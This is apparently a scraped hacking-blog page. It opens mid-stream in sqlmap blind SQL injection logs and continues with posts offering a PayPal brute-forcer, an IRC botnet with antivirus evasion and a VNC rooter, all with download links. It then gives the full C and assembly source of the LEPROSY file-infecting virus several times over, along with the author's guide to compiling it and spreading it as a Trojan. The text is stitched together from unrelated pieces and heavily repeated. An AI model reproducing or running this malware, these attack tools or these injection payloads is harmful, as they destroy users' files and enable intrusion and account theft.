D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 1
[14:34:09] [INFO] retrieved:
[14:34:09] [INFO] performed 6 queries in 12 seconds
[14:34:09] [WARNING] the remote DMBS is not MySQL

As you can see from the above, sqlmap starts trying to understand if the first character of our banner
has an ascii value greater of 63 (that is 127/2). Not in our case.

[14:34:09] [INFO] testing Oracle
[14:34:09] [INFO] query: LENGTH(SYSDATE)
[14:34:09] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 63
[14:34:11] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 31
[14:34:13] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 15
[14:34:15] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 7
[14:34:17] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 3
[14:34:19] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 1
[14:34:21] [INFO] retrieved:
[14:34:21] [INFO] performed 6 queries in 12 seconds
[14:34:21] [WARNING] the remote DMBS is not Oracle
[14:34:21] [INFO] testing PostgreSQL
[14:34:21] [INFO] query: COALESCE(5, NULL)
[14:34:21] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 63
[14:34:23] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 31
[14:34:25] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 15
[14:34:27] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 7
[14:34:29] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 3
[14:34:32] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 1
[14:34:34] [INFO] retrieved:
[14:34:34] [INFO] performed 6 queries in 12 seconds
[14:34:34] [WARNING] the remote DMBS is not PostgreSQL
[14:34:34] [INFO] testing Microsoft SQL Server
[14:34:34] [INFO] query: LTRIM(STR(LEN(1)))
[14:34:34] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 63
[14:34:36] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 31
[14:34:38] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 47
[14:34:41] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 55
[14:34:43] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 51
[14:34:45] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 49
[14:34:46] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 48
[14:34:48] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 63
[14:34:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 31
[14:34:53] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 15
[14:34:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 7
[14:34:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 3
[14:35:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 1
[14:35:03] [INFO] retrieved: 1
[14:35:03] [INFO] performed 13 queries in 28 seconds
remote DBMS: Microsoft SQL Server

The process above is discussed in the paper released by secforce.
Sqlmap has retrieved the database banner/version in approx. 60 seconds.

Blind SQL Injection shell has done in 80 seconds due to the fact that it retrieves all the chars one by one thus being able to retrieve any kind of banner with 100% precision while sqlmap requires the matching of few chars to match it with default banners.

paypal brute-forcer.

So pretty simple, paypal brute-forcer.

Code:

http://www.mediafire.com/?33pyjmzofz9

Dbot v3.0

- stable irc bot
- multicommand topic parsing
- multicommand chat parsing
- irc connection timeout
- unlimited number of irc servers
- xor encoded strings (antivirus anti-heuristic)
- md5 protected important commands (download, remove) - if the command is
long enough, NOONE can steal your bots
- copy to 3 different possible locations, but not windows or system32 dir
- registry startup
- win xp sp2 firewall bypass
- anti-sandbox
- multithreaded ftpd
- cftp supported
- ability to change cftp parameters while bot is running
- scanner:
* distinguese wan and lan bots; eg. lan bots using cftp, wan using ftp
* ability to use ftp or cftp
* multithreaded scanning
* every single thread checks for all ports (less threads needed for
more exploits)
* random or sequential scan
* ability to define range for lan bots to scan
- anti-botkiller protection with nulling all expired strings, coping to
alternative locations instead of windows or system32 dir
- tcpip.sys patcher (ver 1&2)
- botkiller

VNC Password Scanner + Universal VNC rooter :
- finds authbypass, no passworded and passworded vncs
- user defined wordlist
- every RFB3.8 server is checked for authbypass exploit first, if it fails
scanner switch to password checking
- 99,9% accurate scanner, at the time of scanning ALL vncs work!
- alternative VNC rooting via task manager (universal for all languages)
that works on win2000 and win xp
- reporting to irc: vnc version, desktop name, ip and password
- myvnc password reporting

Download:
http://www.darksun.ws/download/uploads/Bots/Dbot.v3.1.rar

Thursday, June 19, 2008

A Compression Tool -kGB archiver

A Compression Tool

Also Supports zip , rar , kgb files

High Compression Ratio

File Size - 1.3 MB

Download Link -

http://rapidshare.com/files/90745460/KGB_Archiver.rar

On-Site Security Assessment

Internal on-site penetration testing gives the business the assurance it needs to conduct safely on the internet and with business partners.

Internal assessments use a similar methodology to an external assessment, however the engagement will occur from within the WAN at each logical management zone, physical segment or simply attached to the DMZ.

To attach to an internal network requires a significant depth of knowledge in many areas. These areas are not limited to Policy, Architecture, Implementation and Auditing across multiple business units, operating systems and devices. Pure Hacking has all of these skill sets.

With most internal assessments, Pure Hacking has discovered for its clients significant business risks that would cease business operations within hours. 20% of the remedial work for these clients gives them 80% of their security effectiveness and as such, the advice guards against network security attacks. The advice is independent of any vendor, and is often accomplished through our clients existing partners.

From an internal assessment, our clients gain more business value if part or all of their operations are outsourced. The recommendations given will be independent of any supplier or vendor, and as such, the current supplier can remedy the situation without further cost. The net results - our clients are safe and get a greater R.O.I from their outsourced partners and the outsourced partners gain specialized security intellectual property.

External Penetration Testing

What is an External Penetration Test?

This test focuses on

* server penetration testing
* router penetration testing
* firewall penetration testing
* operating system installation and maintenance.

The penetration test may be performed with non or full disclosure of the environment in question.
The engagement would start with publicly accessible information about the client, followed by network enumeration.
Network enumeration allows Pure Hacking to target hosts, and specific network security attacks. Pure Hacking would then assess the open ports, services and specific security vulnerabilities, and use that information to gain a toehold into the environment. After a toehold is established, escalation of privilege occurs until the external environment is controlled.

What do you get at the end of the engagement?

Depending on the scope of work, a typical report would include any or all of these components (reference: OSSTMM):

Network Security
Network Surveying
Port Scanning
System Identification
Services Identification
Vulnerability Research & Verification
Application Testing & Code Review
Router Testing
Firewall Testing
Intrusion Detection System Testing
Trusted Systems Testing
Password Cracking
Denial of Service Testing
Containment Measures Testing

Social Engineering
Request Testing
Guided Suggestion Testing
Trust Testing

Wireless Security
Wireless Networks Testing
Cordless Communications Testing
Privacy Review
Infrared Systems Testing

Communications Security
PBX Testing
Voicemail Testing
FAX review
Modem Testing

Physical Security
Access Controls Testing
Perimeter Review
Monitoring Review
Alarm Response Testing
Location Review
Environment Review

Why Pure Hacking

* The only dedicated Penetration Testing company, with a history of industry leadership in Internet Security designed to keep your mission critical systems safe.
* The discovery of real risks and solutions independent of any vendor
* Skills transfer for your staff as Pure Hacking will divulge all intellectual property and tools when Pure Hacking operates with you.
* A worldwide operation, so regardless of the size or location of your network, Pure Hacking will service your need.
* A flexible company that will work within your operational parameters.

At Pure Hacking, an external network security attack is the most common request from our clients. Every day of the week we are performing these engagements and as such, our skill set is efficient and effective. As we are performing penetration tests on a daily basis, we are the industry experts.

We are so confident with the service we offer, we guarantee our work to our client's level of satisfaction and keep continual contact at their requests. Our clients continue to use us because we are trustworthy, knowledgeable and exceptional value.

source code for leprosy_c.c

'Extra-Tiny' memory model startup code for Turbo C 2.0
;
; This makes smaller executable images from C programs, by
; removing code to get command line arguments and the like.
; Compile with Tiny model flag, do not use any standard I/O
; library functions, such as puts() or int86().
;
; This code courtesey PC Magazine, December 26, 1989.
; But nobody really needs to know that.

_text segment byte public 'code'
_text ends
_data segment word public 'data'
_data ends
_bss segment word public 'bss'
_bss ends

dgroup group _text, _data, _bss

_text segment
org 100h
begin:
_text ends

end begin
; 'Extra-Tiny' memory model startup code for Turbo C 2.0
;
; This makes smaller executable images from C programs, by
; removing code to get command line arguments and the like.
; Compile with Tiny model flag, do not use any standard I/O
; library functions, such as puts() or int86().
;
; This code courtesey PC Magazine, December 26, 1989.
; But nobody really needs to know that.

_text segment byte public 'code'
_text ends
_data segment word public 'data'
_data ends
_bss segment word public 'bss'
_bss ends

dgroup group _text, _data, _bss

_text segment
org 100h
begin:
_text ends

end begin
=============================

/* C Code starts here!
This file is part of the source code to the LEPROSY Virus 1.00
Copy-ya-right (c) 1990 by PCM2. This program can cause destruction
of files; you're warned, the author assumes no responsibility
for damage this program causes, incidental or otherwise. This
program is not intended for general distribution -- irresponsible
users should not be allowed access to this program, or its
accompanying files. (Unlike people like us, of course...)
*/

#pragma inline

#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */

/* The following strings are not garbled; they are all encrypted */
/* using the simple technique of adding the integer value 10 to */
/* each character. They are automatically decrypted by */
/* 'print_s()', the function which sends the strings to 'stdout' */
/* using DOS service 09H. All are terminated with a dollar-sign */
/* "$" as per DOS service specifications. */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};

struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */

const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */

char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */

/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */

int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );

/*----------------------------------*/
/* M A I N P R O G R A M */
/*----------------------------------*/

int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain't a file here... */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x < infection_rate ); /* Do this until we've had enough. */
if ( success ) /* If we got something this time, */
print_s( fake_msg ); /* feed 'em the phony error line. */
else
if ( diseased_count > 6 ) /* If we found 6+ infected files */
for( x = 0; x < 3; x++ ) /* along the way, laugh!! */
print_s( virus_msg[x] );
else
print_s( fake_msg ); /* Otherwise, keep a low profile. */
return;
}

void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}

int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}

int healthy( void ) {
int i;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( i = 0; i < 20; i++ ) /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}

void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}

void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}

int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}

int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}

void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}

void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}
/* This file is part of the source code to the LEPROSY Virus 1.00
Copy-ya-right (c) 1990 by PCM2. This program can cause destruction
of files; you're warned, the author assumes no responsibility
for damage this program causes, incidental or otherwise. This
program is not intended for general distribution -- irresponsible
users should not be allowed access to this program, or its
accompanying files. (Unlike people like us, of course...)
*/

#pragma inline

#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */

/* The following strings are not garbled; they are all encrypted */
/* using the simple technique of adding the integer value 10 to */
/* each character. They are automatically decrypted by */
/* 'print_s()', the function which sends the strings to 'stdout' */
/* using DOS service 09H. All are terminated with a dollar-sign */
/* "$" as per DOS service specifications. */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};

struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */

const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */

char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */

/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */

int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );

/*----------------------------------*/
/* M A I N P R O G R A M */
/*----------------------------------*/

int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain't a file here... */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x < infection_rate ); /* Do this until we've had enough. */
if ( success ) /* If we got something this time, */
print_s( fake_msg ); /* feed 'em the phony error line. */
else
if ( diseased_count > 6 ) /* If we found 6+ infected files */
for( x = 0; x < 3; x++ ) /* along the way, laugh!! */
print_s( virus_msg[x] );
else
print_s( fake_msg ); /* Otherwise, keep a low profile. */
return;
}

void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}

int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}

int healthy( void ) {
int i;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( i = 0; i < 20; i++ ) /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}

void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}

void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}

int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}

int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}

void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}

void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}

L E P R O S Y 1 . 0 0

A Virus for MS-DOS Systems.
Copy-ya-right (c) June 29, 1990 by PCM2

GENERAL SUMMARY
~~~~~~~~~~~~~~~

LEPROSY is a virus which can influence PC and PC clone
systems running MS-DOS or PC-DOS version 2.0 or later. It may
be characterized as an overwriting, non-resident .COM and .EXE
infecting virus, similar in operation to the AIDS Virus by
Doctor Dissector and CPI; in fact, the AIDS Virus was actually
the inspiration for this program, though Leprosy is in no way a
re-write or mod of the AIDS Virus, it is an entirely new
program.

The way both Leprosy and the AIDS Virus (and Number One,
the ancestor of AIDS) work is fairly simple. Upon executing the
virus program, the virus runs a search for executable files
which it can affect. It does this by doing a general scan for
all files with a .COM or .EXE extension, then, having found such
a file, it loads in part of that file's code to compare it with
the virus' own code, to make sure the file found hasn't already
been infected. If it hasn't, the virus proceeds to write itself
OVER the code of the executable file found. The executable file
now ceases to perform its original function. When the
unsuspecing user runs the file, he will instead be running
another copy of the virus, which will seek out another
executable file to infect, and so on. The executable files
which are infected by the virus in this manner are permanently
destroyed. While this is a primitive way to spread a virus, it
is actually pretty effective, if you consider that by the time
the user discovers a file which has been infected by the virus,
it has already gone and zapped one or more other files, and by
the time the user finds those files, they will have infected a
few more, and on until the user figures out some way to detect
and eradicate all the infected files.

While Leprosy is similar in operation to the AIDS Virus, it
presents several important advantages over AIDS:

1. CARRIERS: The AIDS Virus will only infect .COM files.
Leprosy is not limited in this way; it will infect both .COM
files and the more common .EXE files, going for .EXE files first.

2. FILE SIZE: The AIDS Virus is written in Pascal, and is about
13K in size. Considering that any file that is infected which
was originally smaller than the virus itself will expand to the

- 1 -

size of the virus when it is infected, and that many .COM files
will be smaller than 13K, quite often a file will show a
noticeable change in size when infected by the AIDS Virus.
Leprosy is only a mere 666 bytes in size; therefore, changes in
file size will be much less frequent, and the disk access time
it takes to infect a new file will be considerably shorter than
when using the AIDS Virus.

3. DUMBSHIT FACTOR: When the AIDS Virus infects a file or fails
to find any non-infected files, it just sits there or hangs up
the system. Leprosy takes a more subtle approach, however.
When Leprosy has infected some files successfully, it prints out
the message "Program too big to fit in memory". This way,
dumbshits might think there is something screwy with their RAMs
or TSRs, and may end up running the same virus-infected file one
or more times before they get a clue.

4. CONCEALMENT: To find out if a file has been infected by the
AIDS Virus, all you need to do is run a hex editor on the file
and look for the full screen reading "AIDS" in the code. Once
again, Leprosy makes it more difficult on the dumbshit user.
All the strings Leprosy outputs to the screen are encrypted in a
simple way, enough to make it impossible to quickly spot
suspicious phrases when running a hex editor on an infected
file. What is more, Leprosy will not change the time/date stamp
on the file when it infects it, unlike AIDS.

5. COMMUNICABILITY: When the AIDS Virus fails to locate any
non-infected .COM file in the current directory, it can no
longer spread itself. The only way an AIDS Virus can spread
from one directory to another is to somehow make it into one of
the directories in the current PATH, and be called by the user
from a different directory. Leprosy gives itself one more
shot. When it fails to find any more non-infected files in the
current directory, it will step back into the parent directory,
and try to find some files again there. While when the virus
exits the current directory will have changed when Leprosy does
this, hopefully the dumbshit won't catch on. The payback is
that Leprosy might eventually creep up to the root directory and
infect COMMAND.COM, and then the user will be fucked over.

6. RATE OF TRANSMISSION: The AIDS Virus will only infect one
file at a time. Leprosy will infect up to four files each time
it is run.

SETTING UP LEPROSY ON A SYSTEM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To install Leprosy onto an un-infected system, all you need
do is run the provided file, LEPROSY.COM, somewhere on that
system, preferably somewhere where it will have access to a lot
of commonly used executables. Alternately, you could infect
some program with an impressive-looking file length and

- 2 -

documentation and send it to someone as a Trojan Horse type
program. Just make sure it gets run.

COMPILING LEPROSY
~~~~~~~~~~~~~~~~~

To assemble the Leprosy .COM file, you will need Turbo C
2.0 and Turbo Assembler. MASM might work, just as long as the
executable file turns out the appropriate length. If the .COM
file doesn't come out to exactly 666 bytes long, then it might
not work properly. C compilers other than Turbo C will probably
not work, since the program makes extensive use of inline
assembler, but versions other than 2.0 will probably be okay.
Just remember -- watch the file length.

The easiest way to re-create Leprosy is to just run MAKE,
and the provided makefile will handle the rest. If you are
compiling it by hand, you should use this makefile as your
guidelines. An important note is that you should not link the
program with the standard Turbo C startup code for the Tiny
memory model; instead, always link it with the provided
alternate startup code. This file, C0T.ASM, is a startup
sequence which gets rid of code to gather command line arguments
and the like, allowing for programs which are essentially as
small as their assembly language counterparts. Just remember,
keep an eye on the executable file size.

WAYS TO SPOT THE VIRUS
~~~~~~~~~~~~~~~~~~~~~~

There are several ways to notice the Leprosy virus on your
system. If small .COM files are increasing in length to 666
bytes, that's your first hint. 666 bytes isn't a very likely
file length, but it's funny, so I'm keeping it that way. Also,
if the current directory changes when you run a program, or you
notice strange "Program too big to fit in memory" errors, that
should tip you off too. Leprosy can also be detected by CRC
checking programs, because it directly modifies the contents of
the files it infects. What is more, Leprosy causes a
distinctive drive noise, sort of a "blickablickablickablicka" on
my hard drive, because it is opening, reading from, writing to,
and closing a number of files very quickly.

ACKNOWLEDGEMENTS
~~~~~~~~~~~~~~~~

I'd like to thank some of the pirate boards in the (415)
area code -- they know who they are.

What is more, I'd like to say that I used the December 26,
1989 issue of PC Magazine, and the book "The NEW Peter Norton
Programmer's Guide to the IBM PC and PS/2" in the process of

- 3 -

writing the Leprosy program. I just thought I'd mention that,
since it kind of makes me laugh to wonder what Peter Norton and
PC Magazine would think if they knew they were partly
responsible for the creation of a virus. HAHA!

Yours truly,
PCM2

P.S. BTW, if Leprosy fails to find any .EXE or .COM files that
aren't infected, but it locates more than 6 executable
files that are already infected with Leprosy, it displays a
message indicating that the system has been infected with
Leprosy, and wishes the user luck. If it can't find any
new files to infect, and only finds 6 or less infected
files during its entire run, it just prints out the fake
"Program too big to fit in memory" message again.

- 4 -

/* This file is part of the source code to the LEPROSY Virus 1.00
Copy-ya-right (c) 1990 by PCM2. This program can cause destruction
of files; you're warned, the author assumes no responsibility
for damage this program causes, incidental or otherwise. This
program is not intended for general distribution -- irresponsible
users should not be allowed access to this program, or its
accompanying files. (Unlike people like us, of course...)
*/

#pragma inline

#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */

/* The following strings are not garbled; they are all encrypted */
/* using the simple technique of adding the integer value 10 to */
/* each character. They are automatically decrypted by */
/* 'print_s()', the function which sends the strings to 'stdout' */
/* using DOS service 09H. All are terminated with a dollar-sign */
/* "$" as per DOS service specifications. */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};

struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */

const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */

char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */

/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */

int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );

/*----------------------------------*/
/* M A I N P R O G R A M */
/*----------------------------------*/

int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
